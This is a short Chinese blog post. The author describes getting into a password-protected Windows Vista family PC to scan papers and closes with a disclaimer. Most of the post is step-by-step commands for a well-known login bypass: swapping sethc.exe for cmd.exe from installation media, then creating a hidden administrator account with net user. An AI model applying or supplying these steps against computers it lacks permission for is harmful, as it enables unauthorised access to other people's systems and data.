今天家里人出门了,但是我要用一台有密码的vista机扫描卷子。怎么办呢?黑进去吧!

用手机查了十分钟,找到一个办法,于是打算记录下来。(我了个去,还是写个免责声明好。见文末。)

我将假设你已经知道:

  • 什么是『windows安装盘』
  • 什么是、如何大致使用cmd
步骤:
  1. 弄个windows安装盘。
  2. 启动,见到『现在安装』按钮按shift+f10。
  3. cd进入c:\windows\system32\
  4. 对粘滞键程序改名: ren sethc.exe sethc-bak.exe
  5. 复制假粘滞键程序: copy cmd.exe sethc.exe
  6. 拔安装盘,重启。
  7. 见到登录界面,连按5下shift
  8. 创建新的用户:net user myNewTempUser /add
  9. 将这个用户添加到管理员组: net localgroup /add administrators myNewTempUser
  10. 重启,搞定。

当然,出于尽量不要打搅别人的态度,我用完之后还把临时用户删掉了: net user myNewTempUser /delete , 并且重新进入WinPE把粘滞键的文件恢复原样。

免责声明:
本文只希望分享一个紧急情况下进入windows系统的方法,而并不希望以此怂恿或帮助任何人恶意进入他人系统。未经允许使用他人电脑者需要对其自身的行为负责。